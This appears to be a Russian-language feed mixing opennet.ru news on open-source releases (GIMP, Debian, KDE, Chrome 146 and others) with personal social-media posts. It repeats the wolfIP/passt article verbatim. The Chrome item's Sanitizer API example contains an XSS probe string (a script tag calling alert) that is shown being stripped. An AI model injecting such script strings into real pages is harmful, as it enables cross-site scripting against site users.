Напомним, что в ряде штатов США продвигаются законопроекты, предписывающие добавление в операционные системы возможности для указания возраста пользователя на этапе регистрации учётной записи и предоставления приложениям программного интерфейса для определения возрастной группы текущего пользователя (младше 13 лет, от 13 до 16 лет, от 16 до 18 лет, 18 лет и старше) для соблюдения законодательства о защите детей в интернете. За невыполнение требований предусмотрены штрафы до $2500 за неумышленное и до $7500 за умышленное нарушение в отношении каждого пострадавшего ребёнка.
Добавление API для запроса приложениями информации о возрасте пользователя уже обсуждается разработчиками дистрибутивов Ubuntu, Debian, Fedora, Linux Mint и NixOS. Конкретные решения ещё не приняты, но рассматривается возможность реализации необходимого API через xdg-desktop-portal или сервис AccountsService с отправкой запросов через новый D-Bus интерфейс "org.freedesktop.AgeVerification1". Руководитель компании System76, разрабатывающей дистрибутив Pop!_OS, пообщался с сенатором штата Колорадо, являющимся соавтором законопроекта о проверке возраста, который предложил подготовить поправки к законопроекту для исключения открытого ПО из области его действия.
Проект MidnightBSD добавил на страницу загрузки предупреждение о запрете использования MidnightBSD жителям штата Калифорния с 1 января 2027 года и Бразилии с 17 марта 2026 года из-за вступления в силу законов о верификации возраста. В случае утверждения законопроектов запрет также распространится на штаты Колорадо, Иллинойс и Нью-Йорк. Утверждается, что разработчики MidnightBSD планируют выполнить требования законов Калифорнии, Колорадо и Иллинойса, но не станут пытаться соответствовать требованиям законов Бразилии и Нью-Йорка, так как MidnightBSD не является коммерческой компанией и не имеет средств для оплаты сервисов верификации.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64995
@iron_bug Раньше считали по зонам,по сути, по километражу. А теперь установили единую цену по городу, а городом считают и некоторые пригороды. Короче на карте территория города вытянута неравномерно в разных направлениях.
Это изменение с этого года, такой популистский шаг, типа на всех видах транспорта проезд единый, но по сути на многих направлениях подорожало.
@bifik цензура стала ломать api.telegram.org, соединения отваливаются по таймауту через раз.
Пока может помочь настроить таймаут и ретраи побольше, если код позволяет. Потом, наверное, совсем убьют и придётся проксировать.
@alado @konflicker А я уже помыл.
В эту сторону периодически едут компанией ромы, там у них посёлок. Но контроллерша обычно их обходит стороной, я тоже так хочу! Наверное знают волшебное слово.
По новым схемам, электричка в сторону, например, Зеленогорска на одинаковое расстояние стоит раз в пять меньше чем на приозерском направлении. Сегодня еду и вижу, что народу явно поубавилось. Заставляет задуматься!
Ну и каждый раз стыдно платить за билет, понятно же, что моя копеечка пойдёт каким-нибудь проходимцам и в итоге вообще где-нибудь пропадёт, но точно не на улучшение поездки.
@abera80486 А ты его в другом месте видел? ;)
Релиз графического редактора GIMP 3.2.0
После года разработки представлен релиз графического редактора GIMP 3.2.0. Готовые сборки опубликованы для Linux (AppImage, ожидается Flatpak), Windows и macOS.
Среди наиболее значимых улучшений в GIMP 3.2:
- Добавлена поддержка слоёв-ссылок (Link layer), позволяющих прикрепить внешние файлы с изображениями в качестве отдельных слоёв. В GIMP к слоям-ссылкам применяется режим недеструктивного редактирования, т.е. манипуляции со слоями-ссылками не влияют на состояние привязанных исходных изображений.
Например, если добавить SVG-файл как слой-ссылку, то после редактирования этого файла в векторном графическом редакторе Inkscape, содержимое слоя в GIMP будет автоматически синхронизировано с состоянием отредактированного файла. При этом если в GIMP отмасштабировать или повернуть содержимое слоя-ссылки, то данные изменения не повлияют на качество исходного изображения.
В будущем планируют добавить возможность привязки не только целых изображений, но отдельных слоёв, т.е. как слои-ссылки можно будет привязать выбранные слои из отдельного XCF-файла.
- Добавлена поддержка векторных слоёв (Vector layer), позволяющих создавать фигуры с заданными свойствами заливки и обводки. Данные хранятся в векторном виде, что позволяет в любой момент изменить контуры фигур (path), выбрать другой цвет заливки или обводки и применить к слою инструменты трансформации в недеструктивном режиме. Для создания векторного слоя следует создать фигуру при помощи инструмента "Контуры" (Path) и нажать кнопку генерации векторного слоя для фигуры, после чего можно, например, повернуть или масштабировать векторный слой без потери качества исходной фигуры.
- Добавлена поддержка нового формата кистей, задействованного в программе для цифровой живописи MyPaint 2.0. Движок для работы с кистями MyPaint теперь учитывает масштаб и поворот холста при рисовании, что позволяет более точно симулировать реальные мазки кистью. В состав GIMP добавлено более 20 новых кистей из набора Dieterle, входящего в состав MyPaint Brushes 2, включая кисти для рисования стрелок и постеризации.
- Реализованы опции для отрисовки эскизов кистей, шрифтов и палитр с использованием цветов фона и переднего плана активной темы оформления. Например, при выборе тёмного режима оформления кисти теперь могут отображаться светлым цветом на тёмном фоне, а не только на белом фоне.

- В инструмент для работы с кистями MyPaint добавлен ползунок "Усиление" (Gain), при помощи которого можно управлять реагированием на степень нажатия при рисовании, например, для симуляции более сильного или слабого нажатия на кисть при рисовании мышью.
- Добавлена возможность недеструктивного применения фильтров к каналам, по аналогии с тем, как это уже реализовано для слоёв. В панели "Каналы" появился столбец Fx и доступна возможность редактирования, перегруппировки, удаления и объединения фильтров. Проведён рефакторинг реализации недеструктивного редактирования изображений, позволивший упростить дальнейшее расширение функциональности и сопровождение кода, а также избавиться от некоторых ошибок.
- В интерфейсе выбора цвета, соответствующего схеме CMYK (CMYK Color Selector), реализован расчёт покрытия чернил (Ink Coverage, количество чернил, наносимых на бумагу в одном месте). При подготовке изображения к печати данный параметр позволяет оценить превышение пороговых значений в системах печати (например, слишком большой Ink Coverage может привести к смазыванию или не подходить для используемого типа бумаги).
- Предложен новый режим смешивания при рисовании - "Overwrite", позволяющий напрямую заменять пиксели в области рисования без смешивания значений прозрачности кисти и существующих пикселей. Режим в основном предназначен для применения с инструментом "карандаш" и может использоваться для пиксельной графики, когда нужно добиться однородной непрозрачности, на которую не влияют уровни прозрачности исходной области.
- В инструмент для работы с текстом добавлена опция для управления направлением окантовки. Например, контур вокруг букв можно направлять внутрь, наружу или в обоих направлениях.
- Реализована возможность перемещения всплывающего окна редактора текста над холстом в любое место, не меняя расположение самой редактируемой области. Произведён рефакторинг кода, решивший проблемы с рендерингом текста при очень больших разрешениях. Добавлено сочетание клавиш для вставки неотформатированного текста из буфера обмена (по-умолчанию назначено на Shift + Ctrl + V) по аналогии с ранее добавленными сочетаниями клавиш для форматирования жирным шрифтом, курсивом и подчёркиванием.
<iframe src="https://peer.tube/videos/embed/64DzkCtrEw9aDr88urpAnj">
- Добавлена дополнительная тема оформления "System Colors", при выборе которой цвета в интерфейсе автоматически подстраиваются под настройки активных системных тем в Linux и Windows, и обновляются при изменении системной темы.
- Добавлен GEGL Filter Browser, интерфейс для навигации по фильтрам на базе библиотеки GEGL (Generic Graphics Library). При помощи GEGL Filter Browser можно посмотреть список доступных операций GEGL (фильтров) и информацию по их использованию.
- В инструменте для создания и редактирования текстовых слоев реализована поддержка комбинаций клавиш "Ctrl + B", "Ctrl + I" и "Ctrl + U" для применения жирного начертания, курсива и подчёркивания. Обеспечено изменение цвета контура текста в реальном времени сразу после изменения цвета в окне выбора цвета, не дожидаясь подтверждения выбора.
- Представлен новый интерфейс плагина Animation Playback, оформленный в стиле видеоплееров, таких как VLC. Вместо индикатора прогресса задействован слайдер, позволяющий переместится на нужный кадр.
- Учтены системные настройки для отключения анимированных эффектов.
- В полях для ввода значений с размером в диалогах настройки сетки и разрешения монитора разрешено использовать математические выражения, например, "3 * 92cm".
- Внесены изменения для упрощения в будущем портирования на GTK4. Например, осуществлён уход от использования GtkTreeView в пользу GtkListBox.
- Добавлена возможность быстрого возврата к прошлому инструменту по сочетанию клавиш (по умолчанию назначено на Shift + X). Несмотря на то, что с технической точки зрения GIMP рассматривает применение фильтров (например, яркость-контаст) как применение инструментов (таких как вращение и кисть), в угоду интуитивности данное сочетание клавиш будет переключаться исключительно между состояниями, отображаемыми в интерфейсе в форме инструментов.
- Появилась возможность открывать множество изображений с помощью перетаскивания файлов на строку вкладок изображений.
- Добавлена возможность перетаскивания образцов цветов из истории применённых цветов. Ранее это не было возможным из-за смещения фокуса на кнопки соответствующего окна.
- Для 64-разрядных сборок GIMP с 1024 пикселей до 8192 пикселей увеличен максимальный размер временных кистей и шаблонов. Для 32-разрядных сборок ограничение не изменилось.
- Добавлена возможность загрузки преднастроек кривых и уровней, используемых в фильтрах Photoshop, и их использование в фильтрах GIMP.
- Обеспечено открытие любых форматов изображений, упакованных в архивы, сжатые алгоритмами, поддерживаемыми в GIMP (ранее такая поддержка была доступна для сжатых файлов в формата XCF).
- Добавлена поддержка загрузки RAW-изображений с камер, используя приложение ART (AnotherRawTherapee, форк RawTherapee).
- Добавлена поддержка экспорта палитры в формате kpl для использования в графическом редакторе Krita.
- Реализована возможность импорта анимированных изображений в формате APNG.
- Добавлена поддержка загрузки многослойных изображений в формате OpenEXR.
- Добавлена поддержка экспорта в формате JPEG 2000 (ранее поддерживался только импорт).
- Добавлена поддержка импорта и экспорта изображений и текстур в формате TIM, применявшемся в играх для приставки Sony Playstation 1.
- Добавлена поддержка импорта и экспорта изображений в формате OpenRaster, использующих расширения для запоминания выбранных и заблокированных слоёв.
- Добавлена поддержка формата OTA Bitmap (Over The Air Bitmap), использовавшегося для кодирования черно-белых изображений на старых телефонах Nokia.
- Добавлена поддержка импорта изображений в форматах AVCI (Advanced Video Coding), JIF (Jeff’s Image Format, расширенный вариант GIF), HRZ, PAA, PVR (PowerVR), SFW93A, SFW94A и HEJ2 (JPEG 2000 в контейнере HEIF), также импорта pat-файлов с шаблонами Photoshop.
- Добавлен новый плагин экспорта в формате SVG, позволяющий включать растровые слои в формате PNG или JPEG.
- Добавлена возможность экспорта векторных изображений в формате PDF.
- Расширена поддержка формата TIFF, для которого реализована возможность загрузки данных о видимости слоёв, режимов смешивания и тегов цветов.
- Добавлена поддержка экспорта изображений в формате PSB, используемом в Photoshop и отличающемся от формата PSD возможностью работы с очень крупными изображениями, разрешение которых превышает 30000 пикселей. При импорте PSD/PSB обеспечено распознание и конвертация применения недеструктивных фильтров Drop Shadow и Inner Shadow.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64993
Выпуск дистрибутива Debian 13.4
Сформировано четвёртое корректирующее обновление дистрибутива Debian 13, в которое включены накопившиеся обновления пакетов и добавлены исправления в инсталлятор. Выпуск включает 111 обновлений с устранением проблем со стабильностью и 67 обновлений с устранением уязвимостей. Из изменений в Debian 13.4 можно отметить обновление до свежих стабильных версий пакетов arduino-core-avr, capstone, flatpak, mariadb, openssl, postgresql, qemu, samba, wireless-regdb, wireshark, xen, zabbix.
Для загрузки и установки "с нуля" подготовлены установочные сборки c Debian 13.4. Системы, установленные ранее и поддерживаемые в актуальном состоянии, получают обновления, присутствующие в Debian 13.4, через штатную систему установки обновлений. Исправления проблем безопасности, включённые в новые выпуски Debian, доступны пользователям по мере выхода обновлений через сервис security.debian.org.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64992
Теперь ломаю голову, не напутал ли я год.
@vikingkong Определённо!
@zeus @kurator88 В центре мужичок ловко на бутылках играет.
Такие стоят погоды, что в городах просыпаются от спячки разные сущности, даже те, кто просыпаться и не должен. А люди стараются кучковаться в очередях в модные места и имеют склонность ходить по одним и тем же прямым маршрутам. От пыльных и запруженных вылезшим на солнце народом Петроградки выбрались — без карты и намерения — к уединенному военно-морскому бункеру у разорённой церкви. С вершины с нерастаявшим ещё снегом видна чапыгинская телебашня на Чапыгина, куда я ребёнком отправлял письма Хохе.
!
PS С новым 7535 (или 7534?) годом, кстати!
(#ленинграднутряной)
@vikingkong Отлично смотрится и сейчас. Научная секция фильм другого плана. Он у меня ассоциируется больше с такими совсем сумасшедшими фильмами как Гонгофер, например.
@fili @th3rdsergeevich За последние 5-6 лет должны же выучить урок не верить и стараться ничего не выполнять, что просят от имени гос-ва.
@iron_bug Ну они сами про себя написали.
@fili Ну ты же не согласился, хотя тебе тоже надо было получить услугу. Значит, эта херь (по сути обман) не на всех действует.
@vikingkong Этот, да, отличное кино. Крутят отреставрированную несколько лет назад версию, правда, я её уже видел, и не раз.
Проходили мимо Ботсада - просто огроменная очередь, кто все эти люди и зачем они туда стоят? Забавно, что рулит очередью престарелый чоповец с эмблемой в*гнера на кепочке.
wolfIP и passt - легковесные стеки TCP/IP, работающие без динамического выделения памяти
Разработчики криптографической библиотеки wolfSSL развивают TCP/IP стек wolfIP, оптимизированный для использования на встраиваемых устройствах, имеющих ограниченные ресурсы, а также для систем, работающих в режиме реального времени, и решений, требующих повышенной надёжности (Safety-Critical). Для предсказуемого потребления ресурсов в wolfIP не используется динамическое выделение памяти - все буферы и таблицы сокетов имеют фиксированный размер и настраиваются не этапе компиляции библиотеки. Код проекта написан на языке Си и распространяется под лицензией GPLv3.
Проект может использоваться в качестве работающего в пользовательском пространстве TCP/IP-стека, подменяющего сетевой стек Linux, FreeBSD и macOS, а также пригодного для применения во встраиваемых системах на базе FreeRTOS, SafeRTOS, Zephyr, Azure RTOS ThreadX, NuttX, RTEMS, VxWorks и QNX. Помимо этог на базе wolfIP могут создаваться самодостаточные сетевые приложения, запускаемые поверх оборудования (bare-metal). В сочетании с библиотекой wolfSSL предоставляется поддержка TLS 1.3, что позволяет создавать компактные встраиваемые системы, поддерживающие HTTPS.
Основные особенности wolfIP:
- Использование предварительно выделенных в статической памяти буферов при обработке сетевых пакетов. Вызовы malloc и free не используются.
- Поддержка API BSD-сокетов в неблокирующем и блокирующем режиме.
- Компактный размер (4200 строк кода, в 4 раза меньше TCP/IP стека lwIP).
- Возможность использования вместо штатных системных сетевых стеков на POSIX-системах.
- Возможность использования сетевого интерфейса TAP для тестирования работы без оборудования.
- Поддержка сетевых интерфейсов STM32 Ethernet.
- Разработка с оглядкой на системы с повышенными требованиями к безопасности: Детерминированная и воспроизводимая конфигурация. Модель развёртывания, обеспечивающая безопасность (Secure-by-default). Изоляция между компонентами. Поддержка безопасного обновления версий. Длительное сопровождение.
- Учёт требований к высоконадёжным системам: отсутствие динамического выделения ресурсов, фиксированные пулы памяти, контролируемое использование ресурсов, предсказуемое поведение, упрощённая архитектура, поддержка генерации артефактов для верификации.
- Реализация IPv4, UDP, TCP, IPSEC, ARP, ICMP, DHCP-клиента, DNS-клиента и HTTP/HTTPS-сервера. Поддержка RFC 7323 (TCP Timestamps, RTT measurement, PAWS, Window Scaling) и MSS (Maximum Segment Size), RTO (Retransmission timeout), SACK (Selective Acknowledgment) в реализации TCP. Несколько алгоритмов контроля перегрузки (congestion control).
Из ограничений wolfIP отмечается возможность использования wolfIP только в роли конечного узла, способного принимать и устанавливать соединения, но не поддерживающего маршрутизацию трафика между сетевыми интерфейсами.
В дополнение можно отметить активное развитие сотрудником Red Hat похожего TCP/IP стека passt, работающего в пользовательском пространстве и не использующем динамическое выделение памяти. Проект passt развивается для организации канала связи между хост-окружением и гостевыми системами в QEMU в качестве более безопасной замены libslirp.
Код passt написан на языке Си, насчитывает около 5000 строк и распространяется под лицензией GPLv2+.
Из особенностей passt можно отметить: поддержка IPv6 помимо IPv4, оптимизации на базе инструкций AVX2, защита от synflood, встроенная поддержка QEMU, libvirt и Podman, пакеты для всех популярных дистрибутивов, сервис ARP proxy, минималистичные серверы DHCPD, DHCPv6 и NDP, seccomp-профиль для блокирования всех неиспользуемых системных вызовов, поддержка NAT, возможность использования в качестве прозрачной замены slirp4netns.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64989
wolfIP и passt - легковесные стеки TCP/IP, работающие без динамического выделения памяти
Разработчики криптографической библиотеки wolfSSL развивают TCP/IP стек wolfIP, оптимизированный для использования на встраиваемых устройствах, имеющих ограниченные ресурсы, а также для систем, работающих в режиме реального времени, и решений, требующих повышенной надёжности (Safety-Critical). Для предсказуемого потребления ресурсов в wolfIP не используется динамическое выделение памяти - все буферы и таблицы сокетов имеют фиксированный размер и настраиваются не этапе компиляции библиотеки. Код проекта написан на языке Си и распространяется под лицензией GPLv3.
Проект может использоваться в качестве работающего в пользовательском пространстве TCP/IP-стека, подменяющего сетевой стек Linux, FreeBSD и macOS, а также пригодного для применения во встраиваемых системах на базе FreeRTOS, SafeRTOS, Zephyr, Azure RTOS ThreadX, NuttX, RTEMS, VxWorks и QNX. Помимо этог на базе wolfIP могут создаваться самодостаточные сетевые приложения, запускаемые поверх оборудования (bare-metal). В сочетании с библиотекой wolfSSL предоставляется поддержка TLS 1.3, что позволяет создавать компактные встраиваемые системы, поддерживающие HTTPS.
Основные особенности wolfIP:
- Использование предварительно выделенных в статической памяти буферов при обработке сетевых пакетов. Вызовы malloc и free не используются.
- Поддержка API BSD-сокетов в неблокирующем и блокирующем режиме.
- Компактный размер (4200 строк кода, в 4 раза меньше TCP/IP стека lwIP).
- Возможность использования вместо штатных системных сетевых стеков на POSIX-системах.
- Возможность использования сетевого интерфейса TAP для тестирования работы без оборудования.
- Поддержка сетевых интерфейсов STM32 Ethernet.
- Разработка с оглядкой на системы с повышенными требованиями к безопасности: Детерминированная и воспроизводимая конфигурация. Модель развёртывания, обеспечивающая безопасность (Secure-by-default). Изоляция между компонентами. Поддержка безопасного обновления версий. Длительное сопровождение.
- Учёт требований к высоконадёжным системам: отсутствие динамического выделения ресурсов, фиксированные пулы памяти, контролируемое использование ресурсов, предсказуемое поведение, упрощённая архитектура, поддержка генерации артефактов для верификации.
- Реализация IPv4, UDP, TCP, IPSEC, ARP, ICMP, DHCP-клиента, DNS-клиента и HTTP/HTTPS-сервера. Поддержка RFC 7323 (TCP Timestamps, RTT measurement, PAWS, Window Scaling) и MSS (Maximum Segment Size), RTO (Retransmission timeout), SACK (Selective Acknowledgment) в реализации TCP. Несколько алгоритмов контроля перегрузки (congestion control).
Из ограничений wolfIP отмечается возможность использования wolfIP только в роли конечного узла, способного принимать и устанавливать соединения, но не поддерживающего маршрутизацию трафика между сетевыми интерфейсами.
В дополнение можно отметить активное развитие сотрудником Red Hat похожего TCP/IP стека passt, работающего в пользовательском пространстве и не использующем динамическое выделение памяти. Проект passt развивается для организации канала связи между хост-окружением и гостевыми системами в QEMU в качестве более безопасной замены libslirp.
Код passt написан на языке Си, насчитывает около 5000 строк и распространяется под лицензией GPLv2+.
Из особенностей passt можно отметить: поддержка IPv6 помимо IPv4, оптимизации на базе инструкций AVX2, защита от synflood, встроенная поддержка QEMU, libvirt и Podman, пакеты для всех популярных дистрибутивов, сервис ARP proxy, минималистичные серверы DHCPD, DHCPv6 и NDP, seccomp-профиль для блокирования всех неиспользуемых системных вызовов, поддержка NAT, возможность использования в качестве прозрачной замены slirp4netns.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64989
Проект TUI Studio развивает визуальную среду для проектирования консольных интерфейсов
Открыт код TUI Studio (Visual Terminal UI Designer), среды для визуального проектирования интерфейсов пользователя, работающих в текстовом терминале. Среда позволяет в интерактивном режиме наглядно формировать интерфейс, перетаскивая готовые блоки мышью, редактируя свойства в визуальном режиме и предпросматривая результат на лету. Сформированный макет интерфейса может быть экспортирован для использования во фреймворках Ink, BubbleTea, Blessed, Textual, OpenTUI и Tview.
Проект написан на TypeScript c использованием React, Vite, Zustand, Tailwind CSS и Lucide React. Код распространяется под лицензией MIT. Из особенностей разработки отмечается, что почти весь код TUI Studio написан AI-ассистентом Claude.
В TUI Studio предоставляется более 20 готовых компонентов для формирования интерфейса (кнопки, меню, таблицы, списки, индикатор прогресса, диалоги, всплывающие подсказки и т.п.) и поддерживается 8 тем оформления, а также светлый и тёмный режим, градиентные заливки, ASCII-цвета и акцентные цвета. Имеется возможность отката изменений. Доступен интерфейс для создания своих компонентов. Проекты сохраняются в формате JSON.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64988
Выпуск MouseControl 1.0, открытой альтернативы Logitech Options+
Опубликован первый выпуск проекта MouseControl, развивающего открытую альтернативу инструментарию Logitech Options+ для настройки раскладки кнопок мышей компании Logitech. В настоящее время проект поддерживает только Bluetooth-мыши Logitech MX Master 3S, но спроектирован для обеспечения поддержки и других моделей устройств. Код проекта написан на Python с использованием QML для интерфейса и распространяется под лицензией MIT. Поддерживаются платформы Windows и macOS (поддержка Linux в списке планов).
В качестве причины разработки открытой альтернативы отмечается недовольство низкой стабильностью работы Logitech Options+ (например, последний выпуск стал потреблять 40-60% ресурсов CPU на устройствах Intel Macbook Pro) и желанием избавиться от отправки телеметрии, привязки к облачному сервису Logitech и необходимости регистрироваться на сайте Logitech.
Среди возможностей MouseControl:
- Ремапинг всех 6 программно настраиваемых кнопок мыши;
- Возможность привязки к приложениям отдельных профилей с настройками;
- Реализация 22 действий, связанных с навигацией, работе в браузере, редактированием и управлением воспроизведением мультимедиа;
- Настройка DPI и скорости перемещения указателя;
- Опции для инвертирования направления вертикальной и горизонтальной прокрутки;
- Автоматическое обновление соединения после временного отключения мыши.
- Поддержка сворачивания в системный лоток.
- Хранение настроек в читаемом файле в формате JSON.
- Графический интерфейс на базе Qt Quick с поддержкой тёмной темы оформдения и интерактивными диаграммами.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64987
@iron_bug Показать, к чему может привести жизнь на бездуховном западе.
@th3rdsergeevich @fili Мне всё время кажется, что люди должны уж поумнеть, перестать бездумно выполнять команды.
@fili На кого это блин рассчитано?
В KDE реализованы KIO S3, установка звуковых тем из файлов и режим ввода спецсимволов
Опубликован очередной еженедельный отчёт о разработке KDE, в котором представлены изменения для ветки KDE Plasma 6.7, релиз которой ожидается в июне. Среди внесённых за неделю изменений:
- Добавлен режим ввода с клавиатуры диакритических знаков и спецсимволов, отсутствующих на физической клавиатуре. При удержании нажатия клавиши, связанной со спецсимволом, теперь показывается всплывающая подсказка, позволяющая во время ввода быстро выбрать нужный спецсимвол. Выбор осуществляется клавишами управления курсором, нажатием упомянутых в подсказке цифр или кликом мыши. Режим реализован в модуле plasma-keyboard и требует включения виртуальной клавиатуры (System Settings > Keyboard > Virtual Keyboard).
- Предоставлена возможность установки собственных звуковых тем из загруженных архивов, без необходимости их предварительной ручной распаковки в каталог .../share/sounds.
- Подготовлен обработчик KIO S3, позволяющий напрямую из Dolphin и приложений KDE работать с файлами, хранимыми в S3-совместимых облачных хранилищах, таких как Amazon S3, Cloudflare R2, DigitalOcean Spaces и MinIO.
- В виджетах для управления буфером обмена и сетевым подключением реализовна унифицированная кнопка возврата на прошлую страницу (на вложенных страницах теперь не показываются две кнопки "Назад").
- В KRunner по умолчанию включён плагин вывода информации о глобальных комбинациях клавиш.
- В виджете с реализацией глобального меню обеспечен показ меню для активного окна, даже если это окно размещено на другом экране. Для возвращения старого поведения, при котором меню пропадает после перемещения окна на другой экран, в настройки добавлена специальная опция.
- При мозаичной компоновке двух смежных окон они теперь равномерно центрируются во всём доступном экранном пространстве с учётом панелей (раньше ближайшее к панели окно сжималось больше, чем другое окно).
- В изолированных приложениях повышена надёжность инициирования записи скринкастов и запросов к удалённым рабочим столам.
- Налажено задействование 3D-ускорения в конфигурациях с несколькими GPU, один из которых не поддерживает OpenGL.
- Решены проблемы работы с буфером обмена в некоторых приложениях на базе фреймворка wxWidgets, таких как KiCad и Audacity. Исправление включено в состав находящейся в разработке ветки wxWidgets 3.3.3.
- В утилиту kscreen-doctor добавлена поддержка изменения свойства экранов "AutoRotatePolicy", определения активного экрана и одновременного включения/выключения поддержки HDR и расширенного диапазона цветов (Wide Gamut).
- Опубликован выпуск Marknote 1.5, приложения для создания и управления коллекцией текстовых заметок, сохраняемых в формате Markdown. В новой версии помимо ранее доступного WYSIWYG-режима визуального редактирования текста, добавлен режим для работы с исходной разметкой Markdown. Также добавлена поддержка вставки ссылок между заметками, реализован полнотекстовый поиск и предложен плагин для интеграции с KRunner.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64986
А между прочим сейчас в кинотеатрах показывают великий фильм «Прикосновение».
#кино
@coolingfan375 Ну не на ксероксе!
Выпуск Chrome 146. Анонсированы официальные Linux-сборки Chrome для ARM64
Компания Google опубликовала релиз web-браузера Chrome 146. Одновременно доступен стабильный выпуск свободного проекта Chromium, выступающего основой Chrome. Браузер Chrome отличается от Chromium использованием логотипов Google, наличием системы отправки уведомлений в случае краха, модулями для воспроизведения защищённого от копирования видеоконтента (DRM), системой автоматической установки обновлений, постоянным включением Sandbox-изоляции, поставкой ключей к Google API и передачей RLZ-параметров при поиске. Для тех, кому необходимо больше времени на обновление, отдельно поддерживается ветка Extended Stable, сопровождаемая 8 недель. Следующий выпуск Chrome 147 запланирован на 7 апреля.
Отдельно компания Google анонсировала публикацию официальных сборок Chrome для Linux-систем на базе архитектуры ARM64. Linux-сборки для ARM64 начнут формироваться во втором квартале 2026 года и будут доступны в пакетах deb и rpm. Ранее официальные сборки Chrome для Linux публиковались только для архитектуры x86_64, а для архитектуры ARM64 были доступны только сторонние сборки Chromium, предлагаемые дистрибутивами. Официальная версия Chrome отличается поддержкой подключения к учётной записи в Google, интеграцией сервисов Google, синхронизацией данных между устройствами, упрощённой установкой дополнений из каталога Chrome Web Store и возможностью включения расширенного режима защиты.
Основные изменения в Chrome 146:
- Для части пользователей включён механизм выборочного ограничения полномочий (Selective permission intervention), который блокирует доступ связанных с показом рекламы JavaScript-скриптов к возможностям, влияющим на конфиденциальность, таким как доступ к информации о местоположении, микрофону, буферу обмена, Bluetooth, USB, последовательному порту и захвату экрана. Идея в том, что если пользователь предоставил странице доступ к подобным возможностям, то эти разрешения не будут применяться для размещённых на этой странице сторонних скриптов, загружаемых с других сайтов (обособленно через тег iframe или напрямую через тег script).
- Изменена структура настроек, связанных с обеспечением безопасности. Для упрощения пользователю предоставлена возможность выбора между стандартным и усиленным уровнем защиты, что позволяет получить желаемый уровень безопасности без необходимости разбираться в деталях и расширенных опциях. При выборе усиленного режима дополнительно выполняется проверка URL и содержимого на серверах Google, выводятся предупреждения для незащищённых соединений и замедляется работа нетипичных для пользователя сайтов для блокирования атак. При желании пользователь может вернуться к старой схеме раздельного конфигурирования каждой настройки. Для управления включением нового оформления настроек безопасности предложен параметр
"chrome://flags/#bundled-security-settings".
- Продолжено развитие AI-режима, позволяющего взаимодействовать с AI-агентом из адресной строки или со страницы, показываемой при открытии новой вкладки. AI-режим даёт возможность задавать сложные вопросы на естественном языке и получать ответы на основе агрегирования информации из наиболее релевантных страниц на заданную тему. При необходимости пользователь может уточнять информацию наводящими вопросами. Режим также позволяет задавать вопросы о содержимом страницы прямо из адресной строки. В Chrome 146 реализована возможность использования файлов из хранилища Google Drive в качестве контекста для AI-агента.
- В режиме автоматического заполнения полей предоставлена возможность использования дополнительных типов данных, которые ранее были доступны только при включении режима расширенного автозаполнения (Enhanced autofill).
- Началось постепенное включение у пользователей защиты от обращения к локальной системе при взаимодействии с публичными сайтами. Обращения с сайтов к IP-адресам локальной сети (интранет или внутренние адреса) или loopback-интерфейсу (127.0.0.0/8) потребует подтверждения операции у пользователя. Под действия защиты попадают попытки загрузки ресурсов, запросы fetch() и iframe-вставки. Защита пока не применяется для соединений через WebSockets, WebTransport и WebRTC, но будет добавлена для них в следующем выпуске.
Обращение к внутренним ресурсам используются злоумышленниками для косвенной идентификации и осуществления CSRF-атак на маршрутизаторы, точки доступа, принтеры, корпоративные web-интерфейсы и другие устройства и сервисы, принимающие запросы только из локальной сети. Для управления попаданием подсетей в категорию внутренних или публичных предложена настройка LocalNetworkAccessIpAddressSpaceOverrides, а для автоматического разрешения доступа для дочерних iframe на основании полномочий родительского iframe-а добавлена настройка
LocalNetworkAccessPermissionsPolicyDefaultEnabled.
- Добавлены CSS-свойства "animation-trigger" и "trigger-scope" для управления анимацией на основе позиции прокрутки страницы. Например, можно запускать, останавливать или перезапускать анимацию при достижении определённой позиции прокрутки, обходясь только декларативным CSS без использования кода на JavaScript.
- Реализована поддержка реестра пользовательских элементов для разделения области видимости пользовательских HTML-элементов, что может потребоваться при использовании на одной странице нескольких разных пользовательских HTML-элементов, имеющих одно и то же имя. В случае использования на странице нескольких библиотек, определяющих элемент с одинаковым именем, при помощи JavaScript-объекта CustomElementRegistry элементы каждой библиотеки можно закрепить за определёнными частями иерархии DOM. Например, если две библиотеки определяют разные элементы с одинаковым именем ‹my-button›, то в одной части страницы можно использовать элемент ‹my-button› из первой библиотеки, а на другой - из второй.
- Добавлен API Sanitizer, который может быть полезен для чистки поступающих извне данных и вырезания из них HTML-тегов, которые могут использоваться для совершения XSS-атак. API предоставляет методы для манипуляции HTML и вырезания из содержимого HTML-элементов, влияющих на отображение и исполнение. Для безопасной вставки HTML-содержимого предложен метод element.setHTML(), похожий на element.innerHTML, но защищающий от межсайтового скриптинга (XSS). Для безопасного разбора HTML реализован метод document.parseHTML().
const unsanitizedString = "abc ‹script›alert(1)‹" + "/script› def";
const sanitizer1 = new Sanitizer({
elements: ["div", "p", "button", "script"],
});
const target = document.getElementById("target");
target.setHTML(unsanitizedString, { sanitizer: sanitizer1 });
- В элементе "meta" реализован параметр с именем "text-scale" (например, ‹meta name="text-scale" content="scale"›), включающий автоматическое масштабирование размера шрифта на странице в соответствии с настройками браузера и операционной системы, если на странице используются относительные единицы измерения (rem и em).
- В API WebGPU добавлен опциональный режим совместимости, предоставляющий подмножество функций, способных работать на системах с устаревшими графическими API, такими как OpenGL и Direct3D11.
- В JavaScript добавлена возможность объединять несколько итераторов в один с помощью метода Iterator.concat().
- В режиме "Origin trials" реализован API WebNN, позволяющий использовать предоставляемые операционной системой сервисы для машинного обучения и связанные с этим аппаратные возможности.
- В режиме "Origin trials" реализован API CPU Performance для получения информации об уровне производительности и характеристиках процессора (число ядер, тип, архитектура, модель, частота и т.п.).
- В режиме "Origin trials" добавлен атрибут "focusgroup", позволяющий вместо табуляции использовать клавиши управления курсором для перемещения между кнопками или другими элементами, связанными с переключением фокуса.
- Внесены улучшения в инструменты для web-разработчиков. В web-консоли обеспечено сохранение результатов редактирования команд при навигации по истории операций. В панели Elements реализовано отображение CSS-стилей, добавленных программно к Shadow DOM, через отдельный узел "#adopted-style-sheets" в дереве DOM, по аналогии с просмотром и редактированием стилей, определённых через тег ‹style›.
